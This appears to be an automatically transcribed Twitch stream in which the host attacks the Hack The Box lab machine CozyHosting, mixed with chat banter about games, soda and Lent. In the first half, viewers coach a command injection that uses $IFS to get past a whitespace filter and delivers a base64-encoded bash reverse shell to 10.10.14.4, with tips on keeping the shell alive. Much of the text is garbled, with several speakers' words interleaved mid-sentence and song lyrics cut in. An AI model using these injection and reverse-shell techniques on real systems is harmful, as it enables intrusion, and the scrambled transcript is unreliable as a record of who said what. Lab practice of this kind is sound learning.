Yep. That was a nice, it was a sip of water. I still have some. I'm gonna finish off my last cup of coffee here. By the way, I suck at marathon. Yeah, I suck. It took me about 10, 15 trips topside to stop dying on arc raiders. I am in a match. I'm in a marathon trip run, maybe 5 minutes. And I either get killed by the bots there or another player. I was shooting on one of the bosses. On the run. And another player started shooting at me.
Heck Inspector says.
Off grabbing lunch for folks.
Wapimune says.
Sounds good, Spectre.
H30 giggle.
Anyways. Oh. Hey, this is the other stuff. You have a actual web page for Twitch Hack now.
Theo
which
says,
is all of
Web
the
link.
commands for all of the different levels, items in the game, rare and special items. Boss battle's been updated. Oh, hidden commands. Great. Yes. Not so fucking hidden anymore. Command reference for all the other all the other commands in the channel.
002 says,
B7H30 Pizza Shake.
Okay.
B7H30 Haxer.
And a
Lucky
boss
you
battle
says.
guide.
That looks amazing.
Sebman says,
Hi Theo.
Sebman,
Theo
what's up?
says,
Web link.
This isn't live. This is just a cute graphic to display kind of like how the game goes, and then there's the logic to the game down here. But I think eventually, I'm going to try to get Claude to make this update live. I think that'd be cool.
Sebman says,
Chillin' and doing ribs.
Ooh, nice. Reloading the update. Okay, so we're going to reload the update. I'm going to start the box and use the bathroom. Cozy hosting should be updated. Oh yeah, that's the other thing we have. What's the, is it help? Actually, it should be on here. I should use the thing that I, it's not on there.
What are we doing, Theo?
We're going to do cozy hosting on Hack the Box. But I have another command that is not on this list. I must have made it after we created the thing. Oh yeah, it's been wiped out. We have to start over. Is it box status? Yeah. So, instead of me fumbling through where we are in the box and try to remember everything, Theobot accesses my notes on Obsidian through sync thing and does a quick summary based on the write-up that we've completed so far. So that's where we're at. Okay, let me get signed in. I got a ton of shit done. Like last night, I burned through so many tokens.
In the hallway, you better get to stepping.
Okay, I'm going to start this and I'm going to go to the bathroom and I'll be right back. It's advanced pause, cozy hosting. Okay. Man, is it cold. Java Jenkins, thank you for the follow. How you doing today?
Java Jenkins says.
Can't complain.
Susan Klein says.
Cold? Time to fire up some Hashcat.
Java Jenkins can't complain now. Yeah. Good. Good for you. Happy. Snooze the ads for a minute. 5 minutes, I think. 5 minutes. Okie dokie, gang. Let's take a look and see. That's right. Okay. So we did use that person's cookie to access the admin page, but what we found was actuator is misconfigured. There's no authorization required. So we can access the endpoint without logging into the website. Java Jenkins, first time in the chat. How did you find us? If you don't mind me asking. Clippy, that's cool.
Java Jenkins says.
Just swiping through the live tab on the mobile app while eating breakfast.
Okay. Well, thanks for stopping here for a spell. Let us know if you have any questions. I go by Theo. Look at that. I must have let that run. I forgot what I pulled down. What did I pull down? Oh, I was looking for... Spring Boot. A Spring Boot script. Okay, that's what that was. All right. We need to... 229.88 into IP. To 29.88. Okay. And at this point, we were trying to pull down, I was trying to pull down a shell. A reverse shell using the curl command. Right. User can't contain white space. So maybe use an encoding. Is it like HTML? And a %20 in my data URL encode. Let's try that. Error bin bash line. %20 to no such file or directory host key verification failed.
Loaf says,
Didn't get it done off stream, then Smile been too busy? Smile.
El Reginho
Yeah.
says,
Evening, Theo.
Hey, Ragano, how you doing? Yeah, Loaf, I didn't get it done. I didn't get it done. I was intending to.
Loaf says,
What's the $20 after I? You also don't need to URL encode your spaces because you're using data URL encode.
Oh, so that this isn't going to do anything anyways. Well, when I run it without it, it says, hey, username can't contain white spaces.
You may need to use $IFS, depending on whether the backend.
Caveman
Dollar
Crafting
IFS.
Almost done with the
I remember
security
that now.
checks, haha.
Loaf says,
Depending on the backend.
El Reginho says,
I'm sorry, Dave.
I'm no
I'm
bad
afraid I
things.
can't do that.
Making chili. Feeling apprehensive about Celtic v the Hordes of Darkness tomorrow. Especially as the game is at their stadium in Snake Mountain. How are you?
Caveman Crafting says,
Had to clean up a bit in the agents.
Loaf says,
No problem.
Best to put it in curly brackets rather than raw dog it.
So $IFS and curly braces. El Ragano. You're apprehensive about Celtic versus the Hordes of Darkness tomorrow. It sounds like it's the plot to a movie, especially as their game is at their stadium in Snake Mountain.
Correct.
Is the foot of the mountain the Hellmouth? Well, Ragano, I can tell you, I'm probably not going to watch, so you have that going for you. And your team is better off than mine. We're still assembling our coaching staff.
El Reginho says,
Nah, it's smellier than a hellmouth.
All right, what came back? Cozy Hosty, command substitution, line 1, expected end of file, while looking for matching, bracket. Did I miss a bracket? I don't think so. Line 2, syntax error. Expected end of file host key verification field.
Loaf says,
Do you have a listener running?
Yeah. Am I using the correct port? Yeah. Oh, wait a minute. This shouldn't be a slash. Right? Where did I get that from? Here.
It should be a slash. Try separating admin and your shell payload with a semicolon. Put one after admin and one after your payload, just to be sure.
Wapimune says,
Right, it's nearly time to down tools and go party here in the UK. Enjoyed today's stream, see you soon Theo. Have fun everyone.
Loaf says,
Whoop, thank you.
Good command separator.
Cannot resolve host name admin. Temporary failure. Looking for matching in bracket.
Java Jenkins says,
I think your first tips has a square bracket.
Loaf says,
Put one after your payload.
Oh my
too.
god. It does.
All good spot, Java Jenkins.
Java Jenkins says,
It's weird that
Darn shift keys.
it asked for it in the previous ones, though.
Loaf says.
I'm sorry,
It
Dave.
looks curly on my
I'm
screen.
afraid I can't
Think
do
I'm due
that.
for a new pair of glasses.
Could not resolve host name admin. Temporary failure in name resolution bin bash. Line 1. Ambiguous redirect bin bash. Command not found.
Key color should have given it away. Put another, after your payload. Outside the...
Oh, okay. But within a single quote. Same error.
Your greater than and is being removed, it seems.
Greater than ampersand.
The error says $ifs 0 at the end. So the 0 greater than and 1 is missing greater than and 1. In cases like this, it's good to base 64 your shell and pipe to base 64D in bash. Echo ni shc shi greater than and /dev /tcp /10.10.14.4 out of 42069 0 greater than and 1, base 64W0.
So we are
$IFS base 64 greater than vertical bar base $64 IFSD vertical bar bash as your payload. So your payload will be that in a payload semicolon.
in here. Cooks, thanks for the hydrate regime. I'm on coffee right now.
Loaf says.
That's the payload now. You send that in your curl instead of the SHI.
Barcode Taurus says,
You got another subscriber on your YouTube. Just realized I were on my alt account on your YouTube. D.
Thank you, Barcode Taurus.
Loaf says,
You need to pipe to bash at the end of the payload as well, but this method avoids a lot of encoding problems.
So I'm wiping out my bash from here. I'm not sure about that trailing pipe though. I don't think.
You need bash after it. Read the payload. You're echoing some base 64, decoding it, and sending the decoded payload, your ref shell, to bash.
Echoing some base 64, which is our encoded
Hansby Formble says,
Are you in yet?
twice. We were in twice already. Is the admin at the beginning screwing up?
Loaf says,
Remove the spaces.
Oh, that's right. That's right. I put him in there so I could see him. Can I resolve host name admin? Is that what I'm sending? Admin? I think it's admin that's in the way now. That's not the endpoint.
Bad file descriptor. You're reading the irrelevant part of the error. Syntax error.
Bad
FD number.
FD number.
So after your last, put a hash, bash comment. Means everything that comes after it will be treated as a comment and not be executed. Okay, now we need to fix that.
Syntax error still. Wait, what's 127? That needs it needs the it needs the IP of what we're attacking, right? Host. Oh, no, it needs a host. That's just a field. It's not.
We came, we saw, we kicked its ass.
Yep. I got.
Value passed it in the host field.
I got there. I got there.
Ignore it. Try with a bash shell instead of sh. Echo ni bash c bash I greater than in /dev/tcp/10.10.14.4 out of 42,069 0 greater than in 1, base 64w0.
Hansby Formable says.
Will FQD and resolve?
That's not what we're. That's not the problem we're after, Hans.
We came, we saw, we kicked its ass.
Loaf says.
Greater than and is not supported by sh, so use bash.
002 says.
B7H30 giggle.
Okay, now we're gonna put this in between. Excuse me.
Loaf says.
Yahtzee.
Yahtzee. Okay. We have to pause here because at a high level, I understand what's going on, but I need to excuse me. I need to have a better understanding.
Hansby Formable says.
We're in like Flynn.
Who's Flynn?
Loaf says.
$IFS is the shit. I love it so much.
Yeah, so we got around the space encoding with $IFS. How come the other one, the questions I'm asking myself now is, how come %20 didn't work? We are on, what kind of, why IFS? Because it's more universally accepted, or because %20, is it HTML? Yeah, I don't know.
%20 would get double encoded because you were using data Earl encoded.
Oh, okay. So %20 would get double would get double encoded, but how come percent curly brace IFS doesn't?
Each character would have been encoded separately even, which would have completely messed up parsing. %IFS isn't a thing, it's $IFS. IFS is an environment variable in Linux.
Percent, I was saying percent, $IFS. Or curling, the endpoint that we know is not taken, doesn't need authentication. It is a unauthenticated endpoint. We're injecting into, we're data URL encoding the first field, which is host, with a generic host name. We're using 127.0.0 because it's local. These hack-to-box machines don't have internet access, so it's a local. So it will take it. Data URL encode for the second one, the username, and we're giving it admin, but then we're doing command injection after it, and passing it. What we're using a semicolon so it continues to pass a command, right? And then we're passing it a command with $IFS as $, yeah, not percent, $IFS for the spaces, because what did you say? $IFS is only seen as an environment variable, is only seen as a space once the shell processes it. The no white space is being enforced by the script. Then we're giving it a, what did we do there? Was that base 64? A base 64 encoded bash reverse shell. I don't know, echo NE. Yeah, we're echoing this thing to base 64 to encode it. I don't know what the other switches do. I have to look at that. So again, we're layer by layer. I'm getting there. Equals. So why are we passing it equals? Oh, that's the end of the thing. No, it isn't. Equals pipe base 64 $ space IFS -D base. I don't know the tail end of that.
$IFS is only seen as a space once the shell processes it. The no white space is being enforced by the script. But hey, if you really want to know what it's doing to your input, you now have access to the source code.
Loaf says.
Semicolon means, I'm done with this command. Everything after is a new command. Base 64 encoded bash reverse shells are what I use for practically every reverse shell. It's so reliable.
Okay,
You didn't need the equals.
Oh.
You left that there for your last base 64.
Wait, what happened? Did I background that?
But it doesn't affect the decoding, so it doesn't matter if it's there or not.
Caveman Crafting says.
Okay, it's cleaned it up. Web link. Going to need to run in like 15 minutes.
Caveman Crafting, thank you for that.
Loaf says.
Gonna need to
The
run.
one thing you should pay attention to is that UI wrapped your reverse shell in another bash. There are 2 bashes.
That's what I was gonna get to next.
Caveman Crafting says.
Bash inception.
I don't know what happened here. It said it timed out, but I still have a connection.
Loaf says.
That's why C is great. It spawns a new shell process.
Heck Inspector says.
Backwishes. Hi.
Oh, here.
Loaf says.
So even if the connection to the web server times out, it always will, you still have a process running.
Heck Inspector says.
Are you winning?
I didn't know you could do that. Your version wraps in
Loaf says.
I fed it to
If you don't
Pentest
wrap in bash C,
Helper.
you may get a temporary shell, or a connection that closes immediately.
Yeah. Wraps in bash C explicitly spawns a new bash process to run the string. The bash C wrapper is more reliable because it guarantees bash interprets the entire string as a single command, even if there are edge cases. I'm not sure I'm understanding its explanation. I like your explanation more.
Kill the listener? And try send a payload without bash C. Take that part out.
Seasoned Mind says.
Oh, so basically you're spawning a new thread.
Loaf says.
See what happens. It may work, it may not.
Heck Inspector says.
Don't
The
kill me.
only way to learn
I'm a
is
listener.
by playing.
says.
The only
Figured
way to
this.
win is by
This is
learning,
how
and the
we
only way
learn.
to begin is by beginning.
Agree, 100%. 100%. On a high level, I understand what's going on, but I'm trying to really drill down to why this
Archification
works.
says.
It's kind of running it as a script, right?
Hey, archification. Yeah, I think so. Okay, so it's... Wait. I didn't take it out. I didn't take the C out.
You'll need to generate a new base 64 without the bash C.
Yep. And then put it in there. Okay, so remove this
Mind
first
says.
bash
Without
C.
bash?
We're just taking out the one. The dash C is what keeps a connection on the machine, as I understand. So remove the first bash C and keep the I can get rid of this, the single quote, I think.
Archification says.
Base 64A? That's a long game of baseball.
Loaf says.
And the single quotes. It spawns a new bash process, which is useful for keeping the riff shell alive.
Seasoned Mind says.
The whole purpose of using bash C command is to spawn it as a new thread so it's not dependent on the web process.
Loaf says.
The pitch must be huge.
So drop this in here.
Imagine how many fielders there would have to be.
Seasoned Mind says.
Otherwise it dies when the web thread completes.
Okay, look at that now. So it executed it.
Loaf says.
Did you have your new listener running?
Yeah. Yeah, I shut it down. I changed directories real quick and then I ran my listener again. And it's connected.
Or did you still have the previous Rochelle that you caught? Do it again.
Yep.
Seasoned Mind says.
So that'll run, but if the web thread checks out, it'll drop.
Okay. Ran it again. You didn't have your listener run in turbo. It stuck that time. Okay. We'll give it a second here and see if it shuts down and kicks us.
Loaf says,
Control plus C, the curl does the same thing as timeout.
Oh, right on. Killed.
Pinakamer 9 says,
Good afternoon. I am just here to distract LOL.
Panic Gamer, how you doing?
Season 9 says,
It doesn't look like...
Doesn't stop the web thread.
Yeah, it doesn't look like it stops it. It's definitely cut off. But I'm still
It
connected.
just cancels curl from listening for the response.
I still like that bash C. I mean, I think I should include that on every friggin' reverse shell I have.
Loaf says,
And this is one case where you're fortunate in that you're still connected. Just get into a habit of using the bash C wrapper.
That.
Because it's far, far more reliable.
Yeah, agree.
Season 9 says,
You know what?
Chicken butt. Get. Thank you.
Season 9 says,
You didn't need bash C because you ran it with vertical bar bash. It ran a double bash command. That's why it's stable.
Naughty Dogful says,
Theo Nady65 cheers Nady65W.
Nate Dog, what's up,
Season
man?
9 says,
What you playing these days?
It ran like bash C already because it's piped directly into bash.
Right, so when the first bash gets terminated, the second one is still there.
Loaf says,
Possibly, but I've definitely has instances where the bash C was still needed when formatted this way.
Yeah, I'm just talking out loud. I'm going to still include it. Do I have a rev shell
Season
folder?
9
I have to have a
says,
rev shell folder.
Echo script. Bash is equivocal to bash C script.
Caveman Crafting says,
Already out to get groceries, smile, will watch remotely. It's so cool knowing my age
I'm
means
sorry,
we're still
Dave.
coding away while I'm
I'm
running
afraid I
around,
can't
smile.
do that.
Caveman
Naughty
Crafting,
Dog
so am I.
says,
Thank you for
Just been
suggesting.
playing, our creators had the exile too and reanimate.
Thank you for sharing. Thank you for suggesting that. I am going to check. I'm going to check this out. I really am. I appreciate you sharing. Help me learn. Okay, man. I'm glad you stopped by today. Good to see you again, and have fun shopping.
Loaf says,
There are also cases where this doesn't work. In those situations you put a bash shell in a file, host it with http.server and curl the bash.
Okay. Yep.
Caveman Crafting says,
Yep, just don't run it on Claude.
Nope.
You will burn through tokens like crazy. Works good on Olama Kami though.
Season 9 says,
Still the same concept. Curl remote script, greater than stout, equivocal to echo script, bash.
Naughty Dogful says.
Tie for shoutout Silver 1632 LG.
Right on, man. Yeah, so Arc Raiders, huh? And what'd you say? It was it's right here. Exile 2, and Reanimal. I was just telling everyone how I was getting my ass kicked playing Marathon last night.
Loaf says.
MHM. Just saying they all have their place, so you need them all in your toolkit.
Seasoned Mind says.
Curl remote script, bash less than.
Naughty Dogful says.
Bro, I got so upset I was playing solos and people are nothing like Arc Raider solos.
Seasoned Mind says.
You just at the end of the day understand what it's doing.
Naughty Dogful says.
I had to get off, I got upset last night.
Yeah. Yep. I was talking about how I was shooting one of the bosses on the end of the stage where I think you obviously need two people, and another player started shooting on me. So, yeah, I mean, you'll have that. We'll see how the game pans out when it launches. Okay. Let's create a new node, I think.
Seasoned Mind says.
I'm trying to break it back down to the stout, and alt thread changing patterns of basic command line in different formats, because at the end of the day, that's what this will boil back down to.
Naughty Dogful says.
Yeah, it seems like a lot of these guys are just sweaty looking to piss people off. Probably in there to get people not to like the game so they stay on Arc Raiders.
Smart. If Arc Raiders devs were smart.
Seasoned Mind says.
I mean,
where do I put
Arc Raiders is going to die eventually. Not very long.
I don't know. I like it. I like it a lot. Especially like the peaceful Unk lobbies that I'm in.
There's only so long you run out and loot the same stuff.
I'm going to have to develop the game a little bit more.
It's got the replay value like Helldivers too.
I liked Helldivers until that latest one with the new aliens. I didn't like the new aliens. The little runners and then the bullet sponges that float around. It pissed me off.
They'll push events to drive map plays.
I like the look of it. It's a gorgeous game. So is Arc Raiders, though. I'm just going to dump a note and pen test notes.
Honestly, lately I've just gone back to Battlefield 6. They pushed out some new maps.
Is that the new one? I downloaded that too. I tried playing it. I don't know. I'm just at that age now.
Yep.
Naughty Dogful says.
I really wanted Battlefield 6 and then everybody kind of stopped playing it, so I'm glad I didn't buy it.
Everybody? Did everybody stop playing it?
Seasoned Mind
I'm just giving you a
says.
hard time.
It's still pretty busy.
Naughty Dog Fool says.
It went from 500,000 to 50,000 players.
Article. Show me the proof. You can't drop nuggets like that in this channel and not provide backup, Nate Dogg. We just got done talking about Discord, Anthropic and the DoD.
That Mind says.
The
well, yay.
Director
that
of
changes with trends.
That director of AI engagement with Claudebot, OpenClaw. Again, I'm just giving you a hard time. I gotta go to the bathroom again. This bossa nova shit's about to put me to sleep. I'm gonna have to change the music.
Heck Inspector says.
Time for some marathon?
I saw you playing it.
Naughty Dogful says.
Too funny, you sent me on a mission. I had to find out how many players are on Battlefield 6, haha. 56,000 currently.
Heck Inspector
And
says.
the article, please.
I didn't even get through the tutorial. Switch to Tarkov cause friends are on.
Oh yeah, Tarkov's still a thing.
Naughty Dogful says.
Top player count for Battlefield 6 was 500,000. Sorry, 774,000. I'd be down to run some marathon with you guys if you look for a third.
Yeah, right on, Nate Dogg. Whisper me your Steam.
Heck Inspector says.
Ha ha ha.
Translated from Tagalog.
That was so funny.
I'm sorry,
You just
Dave.
said whisper.
I'm afraid I can't do that.
Isn't that what they did? Isn't that the Twitch DM? Because Whisper?
That's old school.
Whispers. It literally, it's what it fucking says up there. Whispers. Whatever. I'm always saying cringe shit anymore. I can't open my mouth without saying something cringy. Apparent to my
Where?
My
Naughty
kids.
Dogful says.
Ha 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 ha.
Translated from Tagalog. Heck Inspector says.
Lol.
Naughty Dogful says.
Yeah, it does though.
Loaf says.
Twitch. Click a person's name in chat. Mine says shout because I'm British.
Heck Inspector says.
Gross.
That's funny. Okay. Yep. I can't do it anymore.
Heck Inspector says.
You lasted longer than I would have.
They don't curate those playlists much anymore.
Naughty Dogful says.
I wish I could code the way that you guys do. I can't spell, so that doesn't help. I'm fascinated with this kind of stuff.
I'm not a professional coder, Nate Dogg. I was a professional restaurant manager.
The only way to learn
a professional
the only way to win is by learning.
Beverage distributor, manager, a professional trucking terminal, heavy haul terminal manager.
Firebug says.
I have a pretty good playlist.
Blue Bug. It just takes daily practice. Blue Bug, you have a pretty good playlist. Okay, we'll take your word for it. What's on your pretty good playlist?
Music without lyrics, I guess.
Heck Inspector says.
Web link.
Firebug says.
Lyrics.
Oh, yeah. Got it. Yeah. It helps me concentrate. Too many words in music. I can't concentrate.
Lurk says.
Working hard or hardly working?
You're supposed to put "Am I right?" at the end of that. I think I'm working hard.
Amirt.
Translated from Spanish.
There we go. How you doing, Lurk? Good to see you again. Blue Bug, what's going on? How you doing today?
Heck Inspector says.
Bray.
Stop it.
Firebug says.
Check out a few songs. Web link.
Thank you for that. I'll click on it and bring it up, but I'm not going to check it out right now.
Lurk says.
I'll click on anything, by the way.
It's time to be digging on the game today. Well-deserved rest.
Firebug says.
All good.
Tired, but time to be a DJ on game today. So what are you gaming? What are you playing today, Lurk? That was weird.
Lurk says.
Maybe some Arc Raiders I'd get.
Arc Raiders. Are you an aggressive or are you a don't shoot?
Need to get the goop.
Pure says.
Yes,
Shame
the goop.
I only have Mac malware links ATM.
Songs I like to code to. Cool. Thank you very much.
Lurk says,
I play it by ear. If I get shot, then I wipe their entire team.
Seasoned Mind says,
Nope.
So, aggressive?
Nope. I don't shoot. I don't shoot at all at other players.
Must be a peanut watcher XD.
Even if they shoot at me, I don't. In fact, when I'm down there and they're about to take me out, I'm like, I ask them, how does this make you feel? I hope that I hope that I'm helping you enjoy the game. And then I say goodbye to them because they go off in their aggressive lobbies, and then Embark puts me in my peaceful lobbies. It's apparent that Marathon does not have that kind of matchmaking.
Lurk says,
I wiped 4 to 5 teams once, before getting wiped myself. They kept rolling in and shooting one team at a time.
Oh, that sounds awful. Oh, that sounds so aggressive. Ugh.
I queued with someone that was aggressive. It was brutal.
Heck Inspector says,
No one does. I call BS that Arc Raiders does 2XD.
I do not agree with you. I don't think you can go long enough without shooting someone to be placed in peaceful lobbies. That's what I think. Because I've seen it, man. I've seen it. I'm in my peaceful lobbies, minding my business, talking to raiders. Hey, how you doing? You need help with something? No, I'm good, man. You looking for blueprints? No, I'm good. Thanks for asking. Good luck, raider. For days, I paired up with, it was either DM Nick or Koala Wizard. In they're ridiculously we spawned in and within 2 minutes we were dead. And then for the next day I was in aggressive lobbies. I didn't fire on anyone. And then like a day later, I was back in my peaceful lobbies.
Seasoned Mind says,
It's only goop if you kill someone for it.
Naughty Dogful says,
Arch Raiders did such a good job with their lobbies, probably the best game with the whole lobby situation.
Heck Inspector says,
You shouldn't have to give up and die to people that attack you to get good lobbies XD.
Shoulda, coulda, woulda. I don't make the lobbies. I don't manage any of that. I just know how to work it to enjoy a game that I like playing. You know what I like doing? I like crawling to one of those top of those buildings and shooting at a leaper. That shit's fun. That thing keeps trying to jump up and get me. Love it.
Lurk says,
I believe in defending myself.
Heck Inspector says,
Okay, defend yourself. You're fine. Play the game however you want. Why are you shaming me? Why are you two shaming me for playing the game how I want to play? I can't be in peaceful lobbies. Whatever. Play the game however you want.
Naughty Dogful says,
My girl is doing the expedition. She has 4 million. She's really big into it. She plays a lot of it.
Lurk says,
I got 3. I only have 2. Okay. All right. Maybe I overreacted.
Heck Inspector says,
Nobody is shaming anyone. You just took it poorly. Which means you are shaming us.
Lurk says,
Fair enough.
Just if I happen to play and saw you, your goop is mine.
Grey Hatter says,
What did I just watch?
Everything's under control. Gray Hatter, everything's under control. How you doing today? Pure, you got me. I'm distracted. I'm kind of distracted. I'm doing a quick little tangent on reverse shells, encoding, the switches in reverse shells also.
Naughty Dogful says,
My girl and I are usually in peaceful lobbies.
Lurk says,
Theo, do you like Imagine Dragons?
Yeah, I'm a fan of Imagine Dragons. I like the positive. I like the
Imagine
positive
dragging these
music.
nuts.
Yeah. Yeah, I walked into that. I'll allow it. Nicely done. Nicely done. Yeah. Yep. Good one. Good one.
Heck Inspector says.
Imagine dragging these nuts. Yeah, well, your
Naughty
mom.
Dogful says.
Got him. Ha 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 ha.
Translated from Tagalog. Lurk says.
Imagine your mom
Taking the
dragging these nuts. Ha ha! Got him again. Yeah.
Heck Inspector says.
Gonna have a massive sugar crash soon. Had a frap lol.
Oh, too much sugar. There are a few simple pleasures in life. One is a fresh cup of black coffee. Fight me. Lurk, I would, yeah, I'd shoot at you. Yeah, I'd shoot at you. I would sacrifice my peaceful lobbies to shoot at you once.
So much sugar.
Lurk says.
Drink a Red Bull, you'll be fine.
Ugh, no way.
Inspector
No,
says.
black coffee.
No burnt turds.
I used to distribute that Red Bull.
Pure says.
And the other is a Jaeger bomb.
002 says.
B7H30 coffee.
Thank you, DJ Zero. Thank you. Someone's paying attention.
Heck Inspector says.
You used to distribute burnt turds.
No. Red Bulls. Oh, it sounds awful. All that shooting, constantly losing loot. Oh, God, it sounds terrible.
Ethereal 6 Toe says.
Howdy, folks.
Lurk says.
BTW Theo, it's me Rain. I forgot my password to both accounts and I don't feel like resetting them, so one is signed into my main on my computer and my phone is signed into this one.
Ah, Rain, good to see you again. Gotcha. I was wondering why you were giving me so much sass. The real 6 toes. I have so many questions. Do you have 6 toes on one foot? Are they in fact real? And which flavor of Arizona Tallboy iced teas do you prefer? 3 questions.
Heck Inspector says.
You'll lose the loot anyway when an aggressive shoots you and you don't defend.
Again, I feel attacked. I feel attacked right now.
Lurk says.
Nothing in this world
I'd sub to real 6 toes up.
Ethereal 6 Toe says.
Oh, you asked on one foot. Good job.
Naughty Dogful
Right?
Are
says.
you trying to buy feet pics lol?
Everyone
Heck
gets.
Inspector says.
In fact, I have a
You're
clip
just
that says
moving.
"Flustered Boomer looks for feet pics." I'd sub to real. I mean, I think I would too. You don't see that very often.
Naughty Dogful says.
That's so god.
DM me your
Add me on Steam later, we can run a few.
DM me your Steam. God forbid I say whisper. So much judginess today.
Heck Inspector says.
Marathon is better.
I don't know. You can't judge it yet. It's in beta. It's a you know?
Lurk says,
Actually, I think I have you on Steam. Is your Steam name Bald, or is that another bald dude I'm friends with?
My Steam name is not Bald. Is yours Dick? Thank you. Thank you.
Loaf says,
Names can't be bald.
Heck Inspector says,
Dick.
That's what I'm saying, Inspector. That's what I'm saying.
Lurk says,
I'm serious, Lamau. I'm friends with lots of people that are bald and happen to have bald in their names.
I don't have Bald in my names.
Warrior says,
Well, that's a bald-faced lie.
Thank you, GoPro. Oh, bald-faced.
So
That's
much
what you
loot in the
said.
tutorial of Marathon.
Tutorial. Oh, is that what I was playing? That's why I wasn't dying? That makes sense, actually. That makes sense.
Loaf says,
Archibald, nemesis of all bald people.
Heck Inspector says,
The thing you start in is tutorial. Lol.
Lurk says,
Check Discord 19th floor.
That's not me. Hair's too white.
Loki Abu says,
LMFAO.
Low-key Abu. What's up?
Lurk says,
Might be the council of bald dude I met then.
Naughty Dogful says,
OMG.
Loki Abu says,
Hee.
Translated from Tagalog. Loki Abu says,
Just working on an app and chilling on Twitch. Updating the Obsidian.
Yep. Check it out, Loki Abu.
Lurk says,
Sent you the friend code Theo.
Okay, you know what? Oh, I remember. Oh, this is probably verbose. This terminates the command at the end.
Neat.
Decode. Pipe sends the decoded output to the next command, which is bash, so it executes the decoded string. closes the backtick command that's all the way in front, terminates the inject command cleanly, comments out so it kills the next part. Verbose.
Ethereal 6 Toe says,
what does stabilize mean in shell context?
Goat Breeder says,
Hello.
Naughty Dogful says,
Lurk him in Theo Discord in the gaming tab.
Real 6 Toes. Excuse me. We found a vulnerability in a web page, which is over here. Thanks for asking a question. It'll help me reinforce it. Oh, we don't have it up anymore because we don't need to. We found 2 fields in a website, and both of them are allowing us to send commands directly to the server that they're on. But it does some filtering and doesn't allow spaces. So Goat Breeder, good to see you again. So what we're doing is we're passing a reverse shell to it. And what we mean by stabilizing it is that once you have a reverse shell, if you don't give it certain wrappers or if you don't give it certain commands, then it could get dropped.
Heck Inspector says,
Rapper, Dre, Snoop.
I know what pipe does.
Loaf says,
an unstabilized shell doesn't accept keyboard control characters. Ctrl+C for example will terminate the shell because it's being sent to your local shell, not the remote one. So stabilizing your shell essentially ensures that your control chars are being sent remotely and not interpreted locally.
Lurk says,
thank you, Loaf.
I don't see Goat Clan, I only see a Goat Breeder in the Discord.
Archification says,
you might know just a bit about cooking if you are in restaurants. It's the same thing. Libraries and data are ingredients.
Naughty Dogful says,
Web link.
I know that. It's a backtick. You know that, dude. It closes the other part of the beginning. Okay, you don't need that.
GoProFlowio says,
True.
Archification, thank you.
Goat Breeder says,
When is your OSCP exam?
I don't have one scheduled yet.
Talking about our fave memories. Drinking like if there's nothing to take care of. Promises when we said goodbye. Your sun-kissed face and pretty smile. Remember, baby, my feelings for you still the same, thinking about you.
Okay, quick break for bathroom. Be right back. But we stand up. I lied. I don't want to do that. Because I don't want to have to move the table and shit around.
Can we go back to the night? Dreaming of you at some time. Oh, wow. Even in this song, I need you close. Doesn't matter what I think, just living in the circular song all night. Remember, baby, my feelings for you still the same, thinking about you. Yeah, the songs we sing to, you know, just wish we could go into this night, baby.
Just accosted Mrs. Theo on the steps.
This ain't what I signed up for. Fighting relentlessly.
Why we always gotta keep score? And words are our weaponry.
Naughty Dog
There's any cats
says,
in the hallway, you better
Nady
get
do
the
65 smokehead, Nady do 65 look, Nady do 65 cat.
Sometimes it don't feel real. Every night's like another war. Love is a battlefield. Is it too hard to ask to revive what we had? A sky full of stars and the world in our hands. I wish that our futures be more like our past. Can we make it last? While we slowly fall apart, I'll try to save our damaged hearts. Will you try to mend the scars while we slowly
I've been here the whole time.
Zero 002 says,
Bring your dog with you, B7H30 giggle.
Heck Inspector says,
Lol, you can extract and marathon while down just like our creators. Noise.
무더웠던 8월 기억나 우리 같이 앉아있던 우도
Oh, sorry. Nope. He's firmly attached to Mrs. Theo. And by the way, I trapped her on the stairs.
Ethereal 6 Toe says,
Noise moist voice.
Nice, moist voice.
사실 두려워
Heck Inspector says,
Moist Pikachu can't zap zap because moist no noise was zap zap.
What in the hell was that? Okay, who am I? App.
Goproflowio says,
Do zap.
사실 두려워
Metric says,
Grind.
Symmetrics. How's it going?
Good.
It makes me uncomfortable. Guess the feelings are mutual.
You missed the news discussion. We talked about all kinds of shit, man.
Pulled pork barbecue sandwich and mac and cheese.
Ooh.
Can it be better?
What are you drinking? Drinking a beer? Talking like, or a soda? Or a pop? Because I'm from Ohio, a pop? Can I get a pop?
Dr. Pepper equals.
Dr. Pepper or Diet Dr. Pepper?
Mac and cheese on the pulled pork sandwich.
Symmetric says.
Diet is kinda pointless.
Heck Inspector says.
Dr. Pepper Zero is best.
Symmetric says.
And always tastes like shit.
Naughty Dog says.
I just had mac and cheese pulled pork french fries at Knott's Berry Farm yesterday.
Heck Inspector
The
says.
amusement park?
That's cause you need to add enough whiskey to it.
I just want some sodas with a little less sugar. I don't like diet.
Naughty Dogful says.
Yeah, I live in California, Long Beach.
I don't have a password for app.
Heck Inspector says.
I found a best for me so far at Barks Zero, Dr. Pepper Zero, and Cherry Coke Zero.
Symmetric says.
Lol.
I'm still quite miserable and I'm having ridiculous cravings for sugar and alcohol. It's been just over a week and a half. Last night was bad. I was fucking looking for all kinds of sugary shit to eat. But
Web link.
Naughty Dogful says.
Are you doing it for diet reasons?
GoProFloyo says.
Me too, grams too.
during Lent, I abstain from sugar. Not sugar. I abstain from sugary snacks. I still eat fruit, and alcohol. Yeah, for Lent. Don't be a dick.
Naughty Dogful says.
I would probably explode without sugar and alcohol.
Yep.
Symmetric says.
It's not easy.
For religious reason. But.
No buts. Don't be a dick. You can believe in whatever you believe.
Dried fruit is a good alternative.
Heck Inspector says.
Web link.
No, you don't.
Symmetric says.
Live and let live. Live and let live. What the fuck? Wait, is my dieting during... Let's do this! Let's do this! Is my dieting for religious reasons causing you that much uncomfortability?
I have to be a dick.
Pure says.
Added sugar in the US.
I'll allow it.
So are you just on water, fruit and beer?
Symmetric says.
Lamau.
Translated from Haitian Creole.
Water.
Lamau
Tons of
Lamau,
water.
So kidding Lamau. It has a direct impact on my life, yes.
Goprofloio says.
Bloat. Yes.
Naughty Dogful says.
Yeah. But the bloating
You said
is
that
going
you
down.
think you could be a vagina.
Grey Hatter says.
Wow, you're punchy today. You okay?
Loaf says.
The word uncomfortability is making me uncomfortable.
I don't know what I was trying to get out.
Says.
I was trying to get out like
I say
quickly.
you just have to diet harder.
Oh, no,
Symmetric
it's
says.
not. Well, sugar's
consume
terrible
less,
at my age.
reduces
At
demand,
our age.
And thus production. Henceforth, unto thy behavioureth is raising thy wallet usage.
No,
Equals.
